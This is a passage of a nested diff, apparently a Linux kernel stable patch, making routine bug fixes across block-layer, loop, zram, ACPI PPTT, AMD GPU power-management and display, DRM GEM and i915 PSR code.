+@@ -2743,6 +2743,7 @@ static void blk_mq_dispatch_plug_list(struct blk_plug *plug, bool from_sched)
+ 	struct blk_mq_hw_ctx *this_hctx = NULL;
+ 	struct blk_mq_ctx *this_ctx = NULL;
+ 	struct request *requeue_list = NULL;
++	struct request **requeue_lastp = &requeue_list;
+ 	unsigned int depth = 0;
+ 	LIST_HEAD(list);
+ 
+@@ -2753,10 +2754,10 @@ static void blk_mq_dispatch_plug_list(struct blk_plug *plug, bool from_sched)
+ 			this_hctx = rq->mq_hctx;
+ 			this_ctx = rq->mq_ctx;
+ 		} else if (this_hctx != rq->mq_hctx || this_ctx != rq->mq_ctx) {
+-			rq_list_add(&requeue_list, rq);
++			rq_list_add_tail(&requeue_lastp, rq);
+ 			continue;
+ 		}
+-		list_add_tail(&rq->queuelist, &list);
++		list_add(&rq->queuelist, &list);
+ 		depth++;
+ 	} while (!rq_list_empty(plug->mq_list));
+ 
+diff --git a/block/blk-mq.h b/block/blk-mq.h
+index ef59fee62780d..a7482d2cc82e7 100644
+--- a/block/blk-mq.h
++++ b/block/blk-mq.h
+@@ -378,12 +378,13 @@ static inline bool hctx_may_queue(struct blk_mq_hw_ctx *hctx,
+ #define __blk_mq_run_dispatch_ops(q, check_sleep, dispatch_ops)	\
+ do {								\
+ 	if ((q)->tag_set->flags & BLK_MQ_F_BLOCKING) {		\
++		struct blk_mq_tag_set *__tag_set = (q)->tag_set; \
+ 		int srcu_idx;					\
+ 								\
+ 		might_sleep_if(check_sleep);			\
+-		srcu_idx = srcu_read_lock((q)->tag_set->srcu);	\
++		srcu_idx = srcu_read_lock(__tag_set->srcu);	\
+ 		(dispatch_ops);					\
+-		srcu_read_unlock((q)->tag_set->srcu, srcu_idx);	\
++		srcu_read_unlock(__tag_set->srcu, srcu_idx);	\
+ 	} else {						\
+ 		rcu_read_lock();				\
+ 		(dispatch_ops);					\
+diff --git a/drivers/acpi/pptt.c b/drivers/acpi/pptt.c
+index c91342dcbcd63..ced3eb15bd8b7 100644
+--- a/drivers/acpi/pptt.c
++++ b/drivers/acpi/pptt.c
+@@ -537,16 +537,19 @@ static int topology_get_acpi_cpu_tag(struct acpi_table_header *table,
+ static struct acpi_table_header *acpi_get_pptt(void)
+ {
+ 	static struct acpi_table_header *pptt;
++	static bool is_pptt_checked;
+ 	acpi_status status;
+ 
+ 	/*
+ 	 * PPTT will be used at runtime on every CPU hotplug in path, so we
+ 	 * don't need to call acpi_put_table() to release the table mapping.
+ 	 */
+-	if (!pptt) {
++	if (!pptt && !is_pptt_checked) {
+ 		status = acpi_get_table(ACPI_SIG_PPTT, 0, &pptt);
+ 		if (ACPI_FAILURE(status))
+ 			acpi_pptt_warn_missing();
++
++		is_pptt_checked = true;
+ 	}
+ 
+ 	return pptt;
+diff --git a/drivers/block/loop.c b/drivers/block/loop.c
+index 1b35cbd029c7c..eabbc3bdec221 100644
+--- a/drivers/block/loop.c
++++ b/drivers/block/loop.c
+@@ -1853,35 +1853,44 @@ static blk_status_t loop_queue_rq(struct blk_mq_hw_ctx *hctx,
+ 
+ static void loop_handle_cmd(struct loop_cmd *cmd)
+ {
++	struct cgroup_subsys_state *cmd_blkcg_css = cmd->blkcg_css;
++	struct cgroup_subsys_state *cmd_memcg_css = cmd->memcg_css;
+ 	struct request *rq = blk_mq_rq_from_pdu(cmd);
+ 	const bool write = op_is_write(req_op(rq));
+ 	struct loop_device *lo = rq->q->queuedata;
+ 	int ret = 0;
+ 	struct mem_cgroup *old_memcg = NULL;
++	const bool use_aio = cmd->use_aio;
+ 
+ 	if (write && (lo->lo_flags & LO_FLAGS_READ_ONLY)) {
+ 		ret = -EIO;
+ 		goto failed;
+ 	}
+ 
+-	if (cmd->blkcg_css)
+-		kthread_associate_blkcg(cmd->blkcg_css);
+-	if (cmd->memcg_css)
++	if (cmd_blkcg_css)
++		kthread_associate_blkcg(cmd_blkcg_css);
++	if (cmd_memcg_css)
+ 		old_memcg = set_active_memcg(
+-			mem_cgroup_from_css(cmd->memcg_css));
++			mem_cgroup_from_css(cmd_memcg_css));
+ 
++	/*
++	 * do_req_filebacked() may call blk_mq_complete_request() synchronously
++	 * or asynchronously if using aio. Hence, do not touch 'cmd' after
++	 * do_req_filebacked() has returned unless we are sure that 'cmd' has
++	 * not yet been completed.
++	 */
+ 	ret = do_req_filebacked(lo, rq);
+ 
+-	if (cmd->blkcg_css)
++	if (cmd_blkcg_css)
+ 		kthread_associate_blkcg(NULL);
+ 
+-	if (cmd->memcg_css) {
++	if (cmd_memcg_css) {
+ 		set_active_memcg(old_memcg);
+-		css_put(cmd->memcg_css);
++		css_put(cmd_memcg_css);
+ 	}
+  failed:
+ 	/* complete non-aio request */
+-	if (!cmd->use_aio || ret) {
++	if (!use_aio || ret) {
+ 		if (ret == -EOPNOTSUPP)
+ 			cmd->ret = ret;
+ 		else
+diff --git a/drivers/block/null_blk/main.c b/drivers/block/null_blk/main.c
+index 7d28e3aa406c2..a200aba02e436 100644
+--- a/drivers/block/null_blk/main.c
++++ b/drivers/block/null_blk/main.c
+@@ -1413,8 +1413,7 @@ static inline void nullb_complete_cmd(struct nullb_cmd *cmd)
+ 	case NULL_IRQ_SOFTIRQ:
+ 		switch (cmd->nq->dev->queue_mode) {
+ 		case NULL_Q_MQ:
+-			if (likely(!blk_should_fake_timeout(cmd->rq->q)))
+-				blk_mq_complete_request(cmd->rq);
++			blk_mq_complete_request(cmd->rq);
+ 			break;
+ 		case NULL_Q_BIO:
+ 			/*
+@@ -1675,7 +1674,8 @@ static blk_status_t null_queue_rq(struct blk_mq_hw_ctx *hctx,
+ 	cmd->rq = bd->rq;
+ 	cmd->error = BLK_STS_OK;
+ 	cmd->nq = nq;
+-	cmd->fake_timeout = should_timeout_request(bd->rq);
++	cmd->fake_timeout = should_timeout_request(bd->rq) ||
++		blk_should_fake_timeout(bd->rq->q);
+ 
+ 	blk_mq_start_request(bd->rq);
+ 
+diff --git a/drivers/block/sunvdc.c b/drivers/block/sunvdc.c
+index fb855da971ee7..9fa821fa76b07 100644
+--- a/drivers/block/sunvdc.c
++++ b/drivers/block/sunvdc.c
+@@ -972,6 +972,8 @@ static int vdc_port_probe(struct vio_dev *vdev, const struct vio_device_id *id)
+ 	print_version();
+ 
+ 	hp = mdesc_grab();
++	if (!hp)
++		return -ENODEV;
+ 
+ 	err = -ENODEV;
+ 	if ((vdev->dev_no << PARTITION_SHIFT) & ~(u64)MINORMASK) {
+diff --git a/drivers/block/zram/zram_drv.c b/drivers/block/zram/zram_drv.c
+index e290d6d970474..03ef03e10618d 100644
+--- a/drivers/block/zram/zram_drv.c
++++ b/drivers/block/zram/zram_drv.c
+@@ -2108,9 +2108,9 @@ static int zram_rw_page(struct block_device *bdev, sector_t sector,
+ 	bv.bv_offset = 0;
+ 
+ 	start_time = bdev_start_io_acct(bdev->bd_disk->part0,
+-			SECTORS_PER_PAGE, op, jiffies);
++			op, jiffies);
+ 	ret = zram_bvec_rw(zram, &bv, index, offset, op, NULL);
+-	bdev_end_io_acct(bdev->bd_disk->part0, op, start_time);
++	bdev_end_io_acct(bdev->bd_disk->part0, op, SECTORS_PER_PAGE, start_time);
+ out:
+ 	/*
+ 	 * If I/O fails, just return error(ie, non-zero) without
+diff --git a/drivers/clk/Kconfig b/drivers/clk/Kconfig
+index d79905f3e1744..5da82f2bdd211 100644
+--- a/drivers/clk/Kconfig
++++ b/drivers/clk/Kconfig
+@@ -92,7 +92,7 @@ config COMMON_CLK_RK808
+ config COMMON_CLK_HI655X
+ 	tristate "Clock driver for Hi655x" if EXPERT
+ 	depends on (MFD_HI655X_PMIC || COMPILE_TEST)
+-	depends on REGMAP
++	select REGMAP
+ 	default MFD_HI655X_PMIC
+ 	help
+ 	  This driver supports the hi655x PMIC clock. This
+diff --git a/drivers/cpuidle/cpuidle-psci-domain.c b/drivers/cpuidle/cpuidle-psci-domain.c
+index c80cf9ddabd8a..1fca250d5dece 100644
+--- a/drivers/cpuidle/cpuidle-psci-domain.c
++++ b/drivers/cpuidle/cpuidle-psci-domain.c
+@@ -103,7 +103,8 @@ static void psci_pd_remove(void)
+ 	struct psci_pd_provider *pd_provider, *it;
+ 	struct generic_pm_domain *genpd;
+ 
+-	list_for_each_entry_safe(pd_provider, it, &psci_pd_providers, link) {
++	list_for_each_entry_safe_reverse(pd_provider, it,
++					 &psci_pd_providers, link) {
+ 		of_genpd_del_provider(pd_provider->node);
+ 
+ 		genpd = of_genpd_remove_last(pd_provider->node);
+diff --git a/drivers/firmware/xilinx/zynqmp.c b/drivers/firmware/xilinx/zynqmp.c
+index 129f68d7a6f53..17d1f49750944 100644
+--- a/drivers/firmware/xilinx/zynqmp.c
++++ b/drivers/firmware/xilinx/zynqmp.c
+@@ -206,7 +206,7 @@ static int do_feature_check_call(const u32 api_id)
+ 	}
+ 
+ 	/* Add new entry if not present */
+-	feature_data = kmalloc(sizeof(*feature_data), GFP_KERNEL);
++	feature_data = kmalloc(sizeof(*feature_data), GFP_ATOMIC);
+ 	if (!feature_data)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+index ba092072308fa..1b4105110f398 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_psp.c
+@@ -1685,7 +1685,7 @@ static int psp_hdcp_initialize(struct psp_context *psp)
+ 	psp->hdcp_context.context.mem_context.shared_mem_size = PSP_HDCP_SHARED_MEM_SIZE;
+ 	psp->hdcp_context.context.ta_load_type = GFX_CMD_ID_LOAD_TA;
+ 
+-	if (!psp->hdcp_context.context.initialized) {
++	if (!psp->hdcp_context.context.mem_context.shared_buf) {
+ 		ret = psp_ta_init_shared_buf(psp, &psp->hdcp_context.context.mem_context);
+ 		if (ret)
+ 			return ret;
+@@ -1752,7 +1752,7 @@ static int psp_dtm_initialize(struct psp_context *psp)
+ 	psp->dtm_context.context.mem_context.shared_mem_size = PSP_DTM_SHARED_MEM_SIZE;
+ 	psp->dtm_context.context.ta_load_type = GFX_CMD_ID_LOAD_TA;
+ 
+-	if (!psp->dtm_context.context.initialized) {
++	if (!psp->dtm_context.context.mem_context.shared_buf) {
+ 		ret = psp_ta_init_shared_buf(psp, &psp->dtm_context.context.mem_context);
+ 		if (ret)
+ 			return ret;
+@@ -1820,7 +1820,7 @@ static int psp_rap_initialize(struct psp_context *psp)
+ 	psp->rap_context.context.mem_context.shared_mem_size = PSP_RAP_SHARED_MEM_SIZE;
+ 	psp->rap_context.context.ta_load_type = GFX_CMD_ID_LOAD_TA;
+ 
+-	if (!psp->rap_context.context.initialized) {
++	if (!psp->rap_context.context.mem_context.shared_buf) {
+ 		ret = psp_ta_init_shared_buf(psp, &psp->rap_context.context.mem_context);
+ 		if (ret)
+ 			return ret;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c
+index b1622ac9949ff..e1e0e7ee344c5 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vcn.c
+@@ -26,6 +26,7 @@
+ 
+ #include <linux/firmware.h>
+ #include <linux/module.h>
++#include <linux/dmi.h>
+ #include <linux/pci.h>
+ #include <linux/debugfs.h>
+ #include <drm/drm_drv.h>
+@@ -222,6 +223,24 @@ int amdgpu_vcn_sw_init(struct amdgpu_device *adev)
+ 		return r;
+ 	}
+ 
++	/*
++	 * Some Steam Deck's BIOS versions are incompatible with the
++	 * indirect SRAM mode, leading to amdgpu being unable to get
++	 * properly probed (and even potentially crashing the kernel).
++	 * Hence, check for these versions here - notice this is
++	 * restricted to Vangogh (Deck's APU).
++	 */
++	if (adev->ip_versions[UVD_HWIP][0] == IP_VERSION(3, 0, 2)) {
++		const char *bios_ver = dmi_get_system_info(DMI_BIOS_VERSION);
++
++		if (bios_ver && (!strncmp("F7A0113", bios_ver, 7) ||
++		     !strncmp("F7A0114", bios_ver, 7))) {
++			adev->vcn.indirect_sram = false;
++			dev_info(adev->dev,
++				"Steam Deck quirk: indirect SRAM disabled on BIOS %s\n", bios_ver);
++		}
++	}
++
+ 	hdr = (const struct common_firmware_header *)adev->vcn.fw->data;
+ 	adev->vcn.fw_version = le32_to_cpu(hdr->ucode_version);
+ 
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_device.c b/drivers/gpu/drm/amd/amdkfd/kfd_device.c
+index b8936340742b4..4dbf8dae3437b 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_device.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_device.c
+@@ -59,6 +59,7 @@ static int kfd_gtt_sa_init(struct kfd_dev *kfd, unsigned int buf_size,
+ 				unsigned int chunk_size);
+ static void kfd_gtt_sa_fini(struct kfd_dev *kfd);
+ 
++static int kfd_resume_iommu(struct kfd_dev *kfd);
+ static int kfd_resume(struct kfd_dev *kfd);
+ 
+ static void kfd_device_info_set_sdma_info(struct kfd_dev *kfd)
+@@ -635,7 +636,7 @@ bool kgd2kfd_device_init(struct kfd_dev *kfd,
+ 
+ 	svm_migrate_init(kfd->adev);
+ 
+-	if (kgd2kfd_resume_iommu(kfd))
++	if (kfd_resume_iommu(kfd))
+ 		goto device_iommu_error;
+ 
+ 	if (kfd_resume(kfd))
+@@ -783,6 +784,14 @@ int kgd2kfd_resume(struct kfd_dev *kfd, bool run_pm)
+ }
+ 
+ int kgd2kfd_resume_iommu(struct kfd_dev *kfd)
++{
++	if (!kfd->init_complete)
++		return 0;
++
++	return kfd_resume_iommu(kfd);
++}
++
++static int kfd_resume_iommu(struct kfd_dev *kfd)
+ {
+ 	int err = 0;
+ 
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_events.c b/drivers/gpu/drm/amd/amdkfd/kfd_events.c
+index 729d26d648af3..2880ed96ac2e3 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_events.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_events.c
+@@ -778,16 +778,13 @@ static struct kfd_event_waiter *alloc_event_waiters(uint32_t num_events)
+ 	struct kfd_event_waiter *event_waiters;
+ 	uint32_t i;
+ 
+-	event_waiters = kmalloc_array(num_events,
+-					sizeof(struct kfd_event_waiter),
+-					GFP_KERNEL);
++	event_waiters = kcalloc(num_events, sizeof(struct kfd_event_waiter),
++				GFP_KERNEL);
+ 	if (!event_waiters)
+ 		return NULL;
+ 
+-	for (i = 0; (event_waiters) && (i < num_events) ; i++) {
++	for (i = 0; i < num_events; i++)
+ 		init_wait(&event_waiters[i].wait);
+-		event_waiters[i].activated = false;
+-	}
+ 
+ 	return event_waiters;
+ }
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 1ba8a2905f824..8661de32d80a5 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -4985,9 +4985,9 @@ static void fill_dc_dirty_rects(struct drm_plane *plane,
+ 
+ 		for (; flip_addrs->dirty_rect_count < num_clips; clips++)
+ 			fill_dc_dirty_rect(new_plane_state->plane,
+-					   &dirty_rects[i], clips->x1,
+-					   clips->y1, clips->x2 - clips->x1,
+-					   clips->y2 - clips->y1,
++					   &dirty_rects[flip_addrs->dirty_rect_count],
++					   clips->x1, clips->y1,
++					   clips->x2 - clips->x1, clips->y2 - clips->y1,
+ 					   &flip_addrs->dirty_rect_count,
+ 					   false);
+ 		return;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
+index 8c50457112649..c20e9f76f0213 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
+@@ -992,8 +992,5 @@ void dcn30_prepare_bandwidth(struct dc *dc,
+ 			dc->clk_mgr->funcs->set_max_memclk(dc->clk_mgr, dc->clk_mgr->bw_params->clk_table.entries[dc->clk_mgr->bw_params->clk_table.num_entries - 1].memclk_mhz);
+ 
+ 	dcn20_prepare_bandwidth(dc, context);
+-
+-	dc_dmub_srv_p_state_delegate(dc,
+-		context->bw_ctx.bw.dcn.clk.fw_based_mclk_switching, context);
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+index 9c532167ff466..252356a8160fa 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+@@ -1915,6 +1915,7 @@ int dcn32_populate_dml_pipes_from_context(
+ 	bool subvp_in_use = false;
+ 	uint8_t is_pipe_split_expected[MAX_PIPES] = {0};
+ 	struct dc_crtc_timing *timing;
++	bool vsr_odm_support = false;
+ 
+ 	dcn20_populate_dml_pipes_from_context(dc, context, pipes, fast_validate);
+ 
+@@ -1932,12 +1933,15 @@ int dcn32_populate_dml_pipes_from_context(
+ 		timing = &pipe->stream->timing;
+ 
+ 		pipes[pipe_cnt].pipe.dest.odm_combine_policy = dm_odm_combine_policy_dal;
++		vsr_odm_support = (res_ctx->pipe_ctx[i].stream->src.width >= 5120 &&
++				res_ctx->pipe_ctx[i].stream->src.width > res_ctx->pipe_ctx[i].stream->dst.width);
+ 		if (context->stream_count == 1 &&
+ 				context->stream_status[0].plane_count == 1 &&
+ 				!dc_is_hdmi_signal(res_ctx->pipe_ctx[i].stream->signal) &&
+ 				is_h_timing_divisible_by_2(res_ctx->pipe_ctx[i].stream) &&
+ 				pipe->stream->timing.pix_clk_100hz * 100 > DCN3_2_VMIN_DISPCLK_HZ &&
+-				dc->debug.enable_single_display_2to1_odm_policy) {
++				dc->debug.enable_single_display_2to1_odm_policy &&
++				!vsr_odm_support) { //excluding 2to1 ODM combine on >= 5k vsr
+ 			pipes[pipe_cnt].pipe.dest.odm_combine_policy = dm_odm_combine_policy_2to1;
+ 		}
+ 		pipe_cnt++;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn30/display_mode_vba_30.c b/drivers/gpu/drm/amd/display/dc/dml/dcn30/display_mode_vba_30.c
+index 379729b028474..c3d75e56410cc 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn30/display_mode_vba_30.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn30/display_mode_vba_30.c
+@@ -1802,7 +1802,10 @@ static unsigned int CalculateVMAndRowBytes(
+ 	}
+ 
+ 	if (SurfaceTiling == dm_sw_linear) {
+-		*dpte_row_height = dml_min(128, 1 << (unsigned int) dml_floor(dml_log2(PTEBufferSizeInRequests * *PixelPTEReqWidth / Pitch), 1));
++		if (PTEBufferSizeInRequests == 0)
++			*dpte_row_height = 1;
++		else
++			*dpte_row_height = dml_min(128, 1 << (unsigned int) dml_floor(dml_log2(PTEBufferSizeInRequests * *PixelPTEReqWidth / Pitch), 1));
+ 		*dpte_row_width_ub = (dml_ceil(((double) SwathWidth - 1) / *PixelPTEReqWidth, 1) + 1) * *PixelPTEReqWidth;
+ 		*PixelPTEBytesPerRow = *dpte_row_width_ub / *PixelPTEReqWidth * *PTERequestSize;
+ 	} else if (ScanDirection != dm_vert) {
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_4.h b/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_4.h
+index f77401709d83c..2162ecd1057d1 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_4.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/pmfw_if/smu13_driver_if_v13_0_4.h
+@@ -27,7 +27,7 @@
+ // *** IMPORTANT ***
+ // SMU TEAM: Always increment the interface version if
+ // any structure is changed in this file
+-#define PMFW_DRIVER_IF_VERSION 7
++#define PMFW_DRIVER_IF_VERSION 8
+ 
+ typedef struct {
+   int32_t value;
+@@ -198,7 +198,7 @@ typedef struct {
+   uint16_t SkinTemp;
+   uint16_t DeviceState;
+   uint16_t CurTemp;                     //[centi-Celsius]
+-  uint16_t spare2;
++  uint16_t FilterAlphaValue;
+ 
+   uint16_t AverageGfxclkFrequency;
+   uint16_t AverageFclkFrequency;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+index 992163e66f7b4..bffa6247c3cda 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
++++ b/drivers/gpu/drm/amd/pm/swsmu/inc/smu_v13_0.h
+@@ -29,7 +29,7 @@
+ #define SMU13_DRIVER_IF_VERSION_YELLOW_CARP 0x04
+ #define SMU13_DRIVER_IF_VERSION_ALDE 0x08
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_0_0 0x37
+-#define SMU13_DRIVER_IF_VERSION_SMU_V13_0_4 0x07
++#define SMU13_DRIVER_IF_VERSION_SMU_V13_0_4 0x08
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_5 0x04
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_0_10 0x32
+ #define SMU13_DRIVER_IF_VERSION_SMU_V13_0_7 0x37
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+index 697e98a0a20ab..75f18681e984c 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+@@ -2143,16 +2143,9 @@ static int sienna_cichlid_set_default_od_settings(struct smu_context *smu)
+ 		(OverDriveTable_t *)smu->smu_table.boot_overdrive_table;
+ 	OverDriveTable_t *user_od_table =
+ 		(OverDriveTable_t *)smu->smu_table.user_overdrive_table;
++	OverDriveTable_t user_od_table_bak;
+ 	int ret = 0;
+ 
+-	/*
+-	 * For S3/S4/Runpm resume, no need to setup those overdrive tables again as
+-	 *   - either they already have the default OD settings got during cold bootup
+-	 *   - or they have some user customized OD settings which cannot be overwritten
+-	 */
+-	if (smu->adev->in_suspend)
+-		return 0;
+-
+ 	ret = smu_cmn_update_table(smu, SMU_TABLE_OVERDRIVE,
+ 				   0, (void *)boot_od_table, false);
+ 	if (ret) {
+@@ -2163,7 +2156,23 @@ static int sienna_cichlid_set_default_od_settings(struct smu_context *smu)
+ 	sienna_cichlid_dump_od_table(smu, boot_od_table);
+ 
+ 	memcpy(od_table, boot_od_table, sizeof(OverDriveTable_t));
+-	memcpy(user_od_table, boot_od_table, sizeof(OverDriveTable_t));
++
++	/*
++	 * For S3/S4/Runpm resume, we need to setup those overdrive tables again,
++	 * but we have to preserve user defined values in "user_od_table".
++	 */
++	if (!smu->adev->in_suspend) {
++		memcpy(user_od_table, boot_od_table, sizeof(OverDriveTable_t));
++		smu->user_dpm_profile.user_od = false;
++	} else if (smu->user_dpm_profile.user_od) {
++		memcpy(&user_od_table_bak, user_od_table, sizeof(OverDriveTable_t));
++		memcpy(user_od_table, boot_od_table, sizeof(OverDriveTable_t));
++		user_od_table->GfxclkFmin = user_od_table_bak.GfxclkFmin;
++		user_od_table->GfxclkFmax = user_od_table_bak.GfxclkFmax;
++		user_od_table->UclkFmin = user_od_table_bak.UclkFmin;
++		user_od_table->UclkFmax = user_od_table_bak.UclkFmax;
++		user_od_table->VddGfxOffset = user_od_table_bak.VddGfxOffset;
++	}
+ 
+ 	return 0;
+ }
+@@ -2373,6 +2382,20 @@ static int sienna_cichlid_od_edit_dpm_table(struct smu_context *smu,
+ 	return ret;
+ }
+ 
++static int sienna_cichlid_restore_user_od_settings(struct smu_context *smu)
++{
++	struct smu_table_context *table_context = &smu->smu_table;
++	OverDriveTable_t *od_table = table_context->overdrive_table;
++	OverDriveTable_t *user_od_table = table_context->user_overdrive_table;
++	int res;
++
++	res = smu_v11_0_restore_user_od_settings(smu);
++	if (res == 0)
++		memcpy(od_table, user_od_table, sizeof(OverDriveTable_t));
++
++	return res;
++}
++
+ static int sienna_cichlid_run_btc(struct smu_context *smu)
+ {
+ 	int res;
+@@ -4400,7 +4423,7 @@ static const struct pptable_funcs sienna_cichlid_ppt_funcs = {
+ 	.set_soft_freq_limited_range = smu_v11_0_set_soft_freq_limited_range,
+ 	.set_default_od_settings = sienna_cichlid_set_default_od_settings,
+ 	.od_edit_dpm_table = sienna_cichlid_od_edit_dpm_table,
+-	.restore_user_od_settings = smu_v11_0_restore_user_od_settings,
++	.restore_user_od_settings = sienna_cichlid_restore_user_od_settings,
+ 	.run_btc = sienna_cichlid_run_btc,
+ 	.set_power_source = smu_v11_0_set_power_source,
+ 	.get_pp_feature_mask = smu_cmn_get_pp_feature_mask,
+diff --git a/drivers/gpu/drm/drm_edid.c b/drivers/gpu/drm/drm_edid.c
+index b94adb9bbefb8..0116c947a4b30 100644
+--- a/drivers/gpu/drm/drm_edid.c
++++ b/drivers/gpu/drm/drm_edid.c
+@@ -2797,7 +2797,7 @@ u32 drm_edid_get_panel_id(struct i2c_adapter *adapter)
+ 	 * the EDID then we'll just return 0.
+ 	 */
+ 
+-	base_block = kmalloc(EDID_LENGTH, GFP_KERNEL);
++	base_block = kzalloc(EDID_LENGTH, GFP_KERNEL);
+ 	if (!base_block)
+ 		return 0;
+ 
+diff --git a/drivers/gpu/drm/drm_gem.c b/drivers/gpu/drm/drm_gem.c
+index b8db675e7fb5e..b0246a8480068 100644
+--- a/drivers/gpu/drm/drm_gem.c
++++ b/drivers/gpu/drm/drm_gem.c
+@@ -1375,10 +1375,13 @@ EXPORT_SYMBOL(drm_gem_lru_move_tail);
+  *
+  * @lru: The LRU to scan
+  * @nr_to_scan: The number of pages to try to reclaim
++ * @remaining: The number of pages left to reclaim, should be initialized by caller
+  * @shrink: Callback to try to shrink/reclaim the object.
+  */
+ unsigned long
+-drm_gem_lru_scan(struct drm_gem_lru *lru, unsigned nr_to_scan,
++drm_gem_lru_scan(struct drm_gem_lru *lru,
++		 unsigned int nr_to_scan,
++		 unsigned long *remaining,
+ 		 bool (*shrink)(struct drm_gem_object *obj))
+ {
+ 	struct drm_gem_lru still_in_lru;
+@@ -1417,8 +1420,10 @@ drm_gem_lru_scan(struct drm_gem_lru *lru, unsigned nr_to_scan,
+ 		 * hit shrinker in response to trying to get backing pages
+ 		 * for this obj (ie. while it's lock is already held)
+ 		 */
+-		if (!dma_resv_trylock(obj->resv))
++		if (!dma_resv_trylock(obj->resv)) {
++			*remaining += obj->size >> PAGE_SHIFT;
+ 			goto tail;
++		}
+ 
+ 		if (shrink(obj)) {
+ 			freed += obj->size >> PAGE_SHIFT;
+diff --git a/drivers/gpu/drm/drm_gem_shmem_helper.c b/drivers/gpu/drm/drm_gem_shmem_helper.c
+index 7af9da886d4e5..5fdc608043e76 100644
+--- a/drivers/gpu/drm/drm_gem_shmem_helper.c
++++ b/drivers/gpu/drm/drm_gem_shmem_helper.c
+@@ -622,11 +622,14 @@ int drm_gem_shmem_mmap(struct drm_gem_shmem_object *shmem, struct vm_area_struct
+ 	int ret;
+ 
+ 	if (obj->import_attach) {
+-		/* Drop the reference drm_gem_mmap_obj() acquired.*/
+-		drm_gem_object_put(obj);
+ 		vma->vm_private_data = NULL;
++		ret = dma_buf_mmap(obj->dma_buf, vma, 0);
++
++		/* Drop the reference drm_gem_mmap_obj() acquired.*/
++		if (!ret)
++			drm_gem_object_put(obj);
+ 
+-		return dma_buf_mmap(obj->dma_buf, vma, 0);
++		return ret;
+ 	}
+ 
+ 	ret = drm_gem_shmem_get_pages(shmem);
+diff --git a/drivers/gpu/drm/i915/display/intel_display_types.h b/drivers/gpu/drm/i915/display/intel_display_types.h
+index 1b6989001ee2b..af69521bd1e9b 100644
+--- a/drivers/gpu/drm/i915/display/intel_display_types.h
++++ b/drivers/gpu/drm/i915/display/intel_display_types.h
+@@ -1618,6 +1618,8 @@ struct intel_psr {
+ 	bool psr2_sel_fetch_cff_enabled;
+ 	bool req_psr2_sdp_prior_scanline;
+ 	u8 sink_sync_latency;
++	u8 io_wake_lines;
++	u8 fast_wake_lines;
+ 	ktime_t last_entry_attempt;
+ 	ktime_t last_exit;
+ 	bool sink_not_reliable;
+diff --git a/drivers/gpu/drm/i915/display/intel_psr.c b/drivers/gpu/drm/i915/display/intel_psr.c
+index 5b678916e6db5..8b984c88fd8b1 100644
+--- a/drivers/gpu/drm/i915/display/intel_psr.c
++++ b/drivers/gpu/drm/i915/display/intel_psr.c
+@@ -543,6 +543,14 @@ static void hsw_activate_psr2(struct intel_dp *intel_dp)
+ 	val |= EDP_PSR2_FRAME_BEFORE_SU(max_t(u8, intel_dp->psr.sink_sync_latency + 1, 2));
+ 	val |= intel_psr2_get_tp_time(intel_dp);
+ 
++	if (DISPLAY_VER(dev_priv) >= 12) {
++		if (intel_dp->psr.io_wake_lines < 9 &&
++		    intel_dp->psr.fast_wake_lines < 9)
++			val |= TGL_EDP_PSR2_BLOCK_COUNT_NUM_2;
++		else
++			val |= TGL_EDP_PSR2_BLOCK_COUNT_NUM_3;
++	}
++
+ 	/* Wa_22012278275:adl-p */
+ 	if (IS_ADLP_DISPLAY_STEP(dev_priv, STEP_A0, STEP_E0)) {
+ 		static const u8 map[] = {
